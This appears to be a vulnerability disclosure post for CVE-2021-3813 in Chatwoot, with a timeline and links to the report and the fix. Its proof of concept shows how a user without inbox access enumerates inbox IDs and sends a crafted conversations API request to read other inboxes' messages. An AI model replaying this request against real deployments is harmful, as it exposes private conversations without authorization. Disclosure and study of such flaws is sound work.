Blog

CVE-2021-3813

Improper Privilege Management in Chatwoot prior to v2.2 - CVE-2021-3813

A user without collaborator access to an Inbox is able to reveal the messages from it, by guessing the ID of the Inbox.

Proof Of Concept

Request

  • 1; With an Administrator user, create an Inbox (email type)

  • 2; Only add the Administrator itself to the list of collaborators in the Inbox

  • 3; Create two different account ( A and B user, none of them are Administrators)

  • 3; Send a message to the previously created A user with the Administrator

  • 4; Log in with user B, and obtain the following values from the cookie and headers:

  • uid

  • access-token

  • client

  • whole cookie value

  • account_id

  • 5; With the Administrator, reveal the ID of the Inbox, by getting it from the URL, when the Inbox is opened. This is an incremental value, so the malicious user can easily enumerate it.

  • 6; Use the request attached below, and replace the values mentioned above in the request, and also insert the inbox_id value

GET /api/v1/accounts/2/conversations?inbox_id=<INSERT_INBOX_ID_HERE>&status=open&assignee_type=all&page=1 HTTP/1.1
Host: <INSERT_HOSTNAME_HERE>:3000
Accept: application/json, text/plain, */*
expiry: 1636142330
token-type: Bearer
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Referer: http://<INSER_HOSTNAME_HERE>:3000/app/accounts/2/inbox/1
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
If-None-Match: W/"8ed557c413e99925a3a4c825069d35f9"
Connection: close
Cookie: <INSERT_COOKIE_HERE>
uid: <INSERT_UID_HERE>
access-token: <INSERT_ACCESS_TOKEN_HERE>
client: <INSERT_CLIENT_HERE>
Content-Length: 2

Upon sending the crafted request, the whole details of the Inbox are shown for the non-collaborator user. All the Inboxes are exposed for any user, even if they are not a collaborator of the Inbox itself.

Timeline

References

Reported
September 6th 2021

Validated
September 17th 2021

Fix released
February 04th 2022

Original report
https://huntr.dev/bounties/36f02c4f-cf1c-479e-a1ad-091a1ac7cb56/

CVE
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3813

Fix
https://github.com/chatwoot/chatwoot/commit/9454c6b14f75e778ef98cf84bdafdf0ed8ae5705